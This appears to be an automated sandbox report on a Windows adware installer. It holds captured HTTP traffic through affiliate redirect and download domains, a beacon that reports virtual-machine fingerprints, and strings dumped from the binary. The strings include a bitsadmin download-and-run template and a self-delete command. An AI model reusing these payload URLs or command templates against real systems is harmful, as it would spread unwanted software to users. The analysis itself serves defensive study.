Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Set-Cookie: __cfduid=d640d2d826032587efe6ad339dd60f7a71479014358; expires=Mon, 13-Nov-17 05:19:18 GMT; path=/; domain=.gurusetman.info; HttpOnly
X-Powered-By: PHP/5.4.37
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Cache-Control: post-check=0, pre-check=0
Last-Modified: Sun, 13 Nov 2016 05:19:19 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Location: hXXp://greates.info?ad=2&ver=1&sid=8251&url=http://aclick.adhoc2.net/9AqV-Sgf7ELvPEipl_Cbxm?tt=2&var1=&var2=&var3=9999&name=setup&type=setup&size=3145728&sub_id=346&sub_id2=Kt86-ZfR0bKuZsB7kP3NNhupjIn3i4ti9tLLSX3ap6d1wZXY2bMx_MzcZD4ka-au6b9eF9GlKWFnnbgrmIpGWgtbX_Ngr0gZZWB5Fq21jfakgCiJWr
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: *
Access-Control-Request-Headers: *
Server: cloudflare-nginx
CF-RAY: 300fc49e36a12914-OTP
<<< skipped >>>
GET hXXp://ee.ilentialnessme.bid/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=117&aff_sub2=151377&aff_sub3=&aff_sub4=&aff_sub5=1399165537&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:20 GMT
Connection: close
Content-Length: 593
<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="hXXp://win.ketydesmidiana.bid/aff_c?offer_id=4&aff_id=2291&source=2180&aff_sub=0&aff_sub2=0&aff_sub3=&aff_sub4=&aff_sub5=0&url=http://ee.ilentialnessme.bid/offer.php?affId={aff_id}&trackingId=135176390&instId=2180&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2">here</a></body>
GET /report.php?typ=sys&affId=1006&instId=11&ho_transId=1022cfb36461ebc8195bc69760cdf1&transId=135176390&chk_s_b=VMware-56 4d 22 96 65 fe b6 85-36 78 73 8e 10 74 4e 8c&chk_s_v=HPQOEM - 6040000&chk_c_ma=VMware, Inc.&chk_c_mo=VMware Virtual Platform&chk_mac=00:50:56:33:B5:51&randid=0.44531263149565414 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: InstallCapital
Host: ee.ilentialnessme.bid
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:30 GMT
Content-Length: 0
GET /download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png HTTP/1.0
Host: VVV.dosecuretrips.com
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: X-Target-FN
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Disposition: attachment; filename="Setup__2140_il2.exe"
Content-Type: application/x-msdownload
Date: Sun, 13 Nov 2016 05:19:26 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 13 Nov 2016 05:19:26 GMT
Pragma: no-cache
Server: Apache/2.2.15 (Red Hat)
X-Powered-By: PHP/5.3.3
X-Target-FN: Setup__2140_il2.exe
Content-Length: 716800
Connection: Close
[binary response body: PE executable, 716800 bytes declared. The captured prefix shows an MZ DOS stub ("This program cannot be run in DOS mode"), a Rich header, and sections .text, .rdata, .data, .rsrc and .reloc.]
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2024
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:42 GMT
Last-Modified: Fri, 07 Oct 2016 08:03:05 GMT
ETag: "d9eb4e61c136f58576485da85fc9897d"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64430
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: RNnNcZpMOUg5CGj4HVkrzEXlQWhIkZKaZJi-h-cKXyELoonJcVIG7Q==
..<html><head>.. <meta charset="utf-8">.. <meta name="description" content="">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <title>Thank You Page</title>.. <link rel="stylesheet" href="assets/css/style.css">.. <body>.. <header class="header">.. .<div class="header-top green"></div>.. .<div class="header-bottom grey">.. ..<h1 class="typ">.............. .... ....................</h1>.. .</div>.. </header>.. <div id="widget">.. <div class="adnl_zone">.. <script type="text/javascript">.. /*<![CDATA[*/.. supp_key = "575f4f5e34f49079faeab77365968081";.. supp_time = new Date().getTime();.. supp_channel = "";.. supp_code_format = "ads-sync.js";.. supp_click = "";.. supp_custom_params = {};.. /*]]>*/.. </script>.. <script type='text/javascript' src='//VVV.1-1ads.com/js/show_ads_supp.js?pubId=907'></script>.. </div>.. </div>.. <footer class="footer green">.. .<div class="container">.. ..<h3 class="green">.......... .................., .......... .................. ....................:</h3>.. ..<ul class="steps
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/css/style.css HTTP/1.1
Accept: text/css
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: text/css
Content-Length: 1967
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:49 GMT
ETag: "92657668b4257695bd2699a787aee60b"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64444
X-Cache: Hit from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: TkxLSAtQrofDzYiZGGzEPDHmdWKYGV5NKLAXdAGX1Nu99LN1UPCSVg==
body{...margin: 0;...padding: 0;...font-family: Helvetica, Arial, sans-serif;..}..h1{...margin: 0;...font-size: 28px;...font-weight: normal;...text-align: center;...color: #333;..}...container{...margin: 0 auto;...width: 980px;...padding-left: 20px;...padding-right: 20px;..}...header h1.typ{...line-height: 80px;...padding-top: 0;..}...header h1{...padding-top: 13px;..}...header h1 span{...display: block;...font-size: 14px;..}...header-top, .header-bottom{...position: relative;...height: 80px;...width: 100%;..}...header-top.green{...background: #22B573;..}...header-top.blue{...background: #0461C9;..}...header-bottom.grey{...background: #CCCCCC;..}...header-bottom.light-blue{...background: #B6D2F2;...border-bottom:1px solid #02294C;..}..#widget{...margin: 0 auto;...margin-top: 50px;...margin-bottom: 150px;..}...footer{...position: relative;...width: 100%;...height: 216px;...background: #e5e5e5;...border-top: 1px solid #fff;...-webkit-box-sizing: border-box;...-moz-box-sizing: border-box;...box-sizing: border-box;..}...footer:before{...position: absolute;...left: 0;...right: 0;...top: -2px;...height: 1px;...width: 100%;...content: '';.....}...footer.green:before{...background: #0F4C2E;..}...footer.blue:before{...background: #02294C;..}...footer h3{...margin-top: 38px;...margin-bottom: 28px;...font-size: 18px;...text-align: center;...text-shadow: -1px 1px 0 #fff;..}...footer h3.green{...color: #22B573;..}...footer h3.blue{...color: #0461C9;..}..ul.steps{...margin: 0;...padding: 0;...list-style-type: none;..}..ul.st
<<< skipped >>>
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 403 Forbidden
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: keep-alive
Date: Sun, 13 Nov 2016 05:18:13 GMT
Server: AmazonS3
Age: 82
X-Cache: Error from cloudfront
Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)
X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==
f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..HTTP/1.1 403 Forbidden..Content-Type: application/xml..Transfer-Encoding: chunked..Connection: keep-alive..Date: Sun, 13 Nov 2016 05:18:13 GMT..Server: AmazonS3..Age: 82..X-Cache: Error from cloudfront..Via: 1.1 0f820adb6671fcc6033a9aa95ec8e0fb.cloudfront.net (CloudFront)..X-Amz-Cf-Id: fXaJKV8QCC1-uGe2jqVL60EcnCsHeMmojKoDEP-Ks0uEmJniEtuHug==..f3..<?xml version="1.0" encoding="UTF-8"?>.<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5BB8DEA19076C304</RequestId><HostId>LWCozxd6XPbPKEl3NYSn/ yXE9CAeg0hAv0mqYqDTyL7Fc7lhCJdt9GChZUouqV4QcMLE2bdimk=</HostId></Error>..0..
GET /js/show_ads_supp.js?pubId=907 HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: VVV.1-1ads.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=3600
Transfer-Encoding: chunked
Date: Sun, 13 Nov 2016 05:19:34 GMT
Connection: close
2000..var supp_ads_host_overridden="//VVV.1-1ads.com";.var supp_key,supp_channel,supp_code_format,supp_ads_host,supp_ads_host_overridden,supp_click,supp_custom_params,supp_width,supp_height,supp_target_id,supp_template_target_id,SuppConfig,SuppAdsConfig=SuppConfig,CustomWLAdServer=CustomWLAdServer||{requests:[]};.CustomWLAdServer.sendbackPlacementKeyFromRequests=function(a){var c=CustomWLAdServer;if(c.requests&&0<c.requests.length&&c.passbackCallbacks&&c.passbackCallbacks["v2-" a])for(var b in c.passbackCallbacks["v2-" a]){var d=c.findRepReqByKey(b);(d=d&&(d.supp_target_id||d.elemId))&&document.getElementById(d)&&c.doPostMessageFuncIntoIFrames(document.getElementById(d),"customwl.plkey.for.banner" a "\x3d" b)}};.try{var messageEventListener=function(a){if(a&&a.data&&"string"===typeof a.data){if(0==a.data.indexOf("rrImpl")){try{eval("CustomWLAdServer." a.data)}catch(c){console.warn(c)}return!0}if(0==a.data.indexOf("sendRequestInfo:")){var b=a.data.substring(16),b=CustomWLAdServer.findRepReqByKey(b);if(null!=b)return b.elemId&&document.getElementById(b.elemId)&&document.getElementById(b.elemId).contentWindow&&document.getElementById(b.elemId).contentWindow.postMessage("requestInfoMessage:" JSON.stringify(b),."*"),!0}if(0===a.data.indexOf("customwl.plkey.request.for.banner\x3d")){var b=a.data.split("\x3d")[1],d=CustomWLAdServer,e=d.passbackCallbacks&&d.passbackCallbacks["v2-" b];if(e)if(1==Object.keys(e).length)e[Object.keys(e)[0]]();else d.sendbackPlacementKeyFromRequests(b)}if(0==a.data.indexOf("requestInfoMe
<<< skipped >>>
GET /pr/72e8e276-8bc5-11e6-a5ec-0695da005429/assets/img/icon3-green.png HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: hXXp://ic-dc.deliverydlcenter.com/pr/72e8e276-8bc5-11e6-a5ec-0695da005429/typ_1.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: ic-dc.deliverydlcenter.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: image/png
Content-Length: 1519
Connection: keep-alive
Date: Mon, 10 Oct 2016 08:52:43 GMT
Last-Modified: Fri, 07 Oct 2016 08:02:51 GMT
ETag: "659184a48243f6ae257bc88d601ac7e1"
Accept-Ranges: bytes
Server: AmazonS3
Age: 64443
X-Cache: Hit from cloudfront
Via: 1.1 0176a7920fd558900dd5f893f79acb9e.cloudfront.net (CloudFront)
X-Amz-Cf-Id: hwFaWw-7Nj8eeAHF2MXvCTn7uuTK6GtEQuMIKFI2ctTLJUFa2FHwEQ==
<<< skipped >>>
GET /get.php?ses=429155916441231936 HTTP/1.0
Host: away.yosauruslega.bid
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Type: application/octet-stream
Content-Length: 636416
Connection: close
Cache-Control: no-store, no-cache, must-revalidate,post-check=0, pre-check=0
Pragma: no-cache
Expires: Sun, 01 Jan 2014 00:00:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Access-Control-Allow-Origin: *
Content-Transfer-Encoding: Binary
Content-disposition: attachment; filename="cpSetup.exe"
Date: Sun, 13 Nov 2016 05:18:17 GMT
X-Cache: Miss from cloudfront
Via: 1.1 420810dc8ca5cb74b64cae9e4b264cc9.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WzMfcmhZ-U-zig-ivUSgMwISw4lkFuvogIDTJNXx0sRnwuKboE_IfQ==
<<< skipped >>>
GET hXXp://ee.ilentialnessme.bid/offer.php?affId=2291&trackingId=135176390&instId=2180&ho_trackingid=1022cfb36461ebc8195bc69760cdf1&cc=UA&cc_typ=ho&sb=x86&wv=7sp1&db=InternetExplorer&uac=1&cid=5c12d1104cca24294ae7d8d45ce8d028&v=2 HTTP/1.1
Host: ee.ilentialnessme.bid
Connection: close
Accept: */*
User-Agent: InstallCapital
HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: PHP/5.3.28
Date: Sun, 13 Nov 2016 05:18:21 GMT
Connection: close
Content-Length: 1768
<<< skipped >>>
Map
The Application connects to the servers at the following location(s):
Strings from Dumps
Setup__2140_il2.exe_3512:
.text
`.rdata
@.data
.rsrc
@.reloc
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
operator
GetProcessWindowStation
WinHttpSetStatusCallback
Failed to get the Temp folder: %d
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
RegDeleteKeyExW
CInstallationManager::IsPartOfInstallation value=%s
CInstallationManager::SetComponentInstallationEnded %S
%Y-%m-%d %H:%M:%S
CProgressUpdateRequest::CreateInstance %S
CProgressUpdateRequest::ProgressUpdate %S
Send progress update request %s
Progress Request for '%S' return %s
%c%c%c%c
C:\Amon\AmonSystemBs\BootStrapper\ProductionNoSign\Launcher.pdb
VERSION.dll
KERNEL32.dll
USER32.dll
GDI32.dll
RegDeleteKeyW
RegCloseKey
RegQueryInfoKeyW
RegEnumKeyExW
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
Secur32.dll
WinHttpCloseHandle
WinHttpOpen
WinHttpSetOption
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetStatusCallback
WinHttpSendRequest
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WinHttpReceiveResponse
WINHTTP.dll
GetProcessHeap
GetCPInfo
.?AVAsyncWinHttp@@
.?AV?$_IDispEventLocator@$0MJ@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$IDispEventSimpleImpl@$0MJ@VCBoot@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AUISupportErrorInfo@@
.?AV?$CAtlExeModuleT@VCBootStrapperModule@@@ATL@@
noesis.beryline.1 = s 'Inst Class'
CLSID = s '{ca90508a-de03-464c-b43f-2ab03068b458}'
noesis.beryline = s 'Inst Class'
CurVer = s 'noesis.beryline.1'
ForceRemove {ca90508a-de03-464c-b43f-2ab03068b458} = s 'Inst Class'
ProgID = s 'noesis.beryline.1'
VersionIndependentProgID = s 'noesis.beryline'
val ServerExecutable = s '%MODULE_RAW%'
TypeLib = s '{b12fc5b9-4613-4ff8-8f59-17f01c4b0f69}'
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*" />
stdole2.tlbWWW(
stdole2.tlbWWW(
msgWd
msgWd
keyNameW
keyNameW
urlW
urlW
url2d
url2d
YtcmdLineW
YtcmdLineW
P%CreateIconWW
P%CreateIconWW
iconUrlW
iconUrlW
regKeyWW
regKeyWW
CheckRegKeyW
CheckRegKeyW
keyWd
keyWd
W.launchCommandLineWWW
W.launchCommandLineWWW
~cmdW
~cmdW
WDIsShortNameInstalledd
WDIsShortNameInstalledd
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
Created by MIDL version 7.00.0555 at Sun Oct 16 03:45:47 2016
: :):0:`:
: :):0:`:
3!3@3^3{3
3!3@3^3{3
3"3&3*3.395
3"3&3*3.395
1%2S2v2
1%2S2v2
mscoree.dll
mscoree.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
wKERNEL32.DLL
wKERNEL32.DLL
ADVAPI32.DLL
ADVAPI32.DLL
WUSER32.DLL
WUSER32.DLL
Winhttp.dll
Winhttp.dll
shlwapi.dll
shlwapi.dll
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
HKEY_CLASSES_ROOT
appimageurl
appimageurl
cmdl
cmdl
capp=%s&cid=%s&mhx=%S&base=%s
capp=%s&cid=%s&mhx=%S&base=%s
\bitsadmin.exe
\bitsadmin.exe
\Support Tools\bitsadmin.exe
\Support Tools\bitsadmin.exe
:?*\"'/.
:?*\"'/.
dream.capture
dream.capture
%sami%s%d%d.exe
%sami%s%d%d.exe
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:%.2d:00
%d-%.2d-%.2dT%.2d:-:00
%d-%.2d-%.2dT%.2d:-:00
/retrynav %d
/retrynav %d
Advapi32.dll
Advapi32.dll
shell32.dll
shell32.dll
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
{23A96663-59D1-4C44-A0DB-1118D9C4ABBA}
OLEAUT32.DLL
OLEAUT32.DLL
kernel32.dll
kernel32.dll
sn=%s&hx=%S&base=%s
sn=%s&hx=%S&base=%s
rfsw%d
rfsw%d
advapi32.dll
advapi32.dll
v2.0.50727
v2.0.50727
v1.1.4322
v1.1.4322
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
%ProgramFiles%\Microsoft Silverlight\sllauncher.exe
ami%sExd
ami%sExd
bitsadmin /transfer amijob /download /priority high %s %s
bitsadmin /transfer amijob /download /priority high %s %s
ami%sExi
ami%sExi
/c del "%s"
/c del "%s"
cmd.exe
cmd.exe
%TEMP%\task.vbs
%TEMP%\task.vbs
ami%sExdel
ami%sExdel
%%X
%%X
version.dll
version.dll
OleAut32.dll
OleAut32.dll
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Setup__2140_il2.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}
{8856F961-340A-11D0-A96B-00C04FD705A2}
1.1.5.26
1.1.5.26
setup.exe
setup.exe
selfdislikedfarfet.site
selfdislikedfarfet.site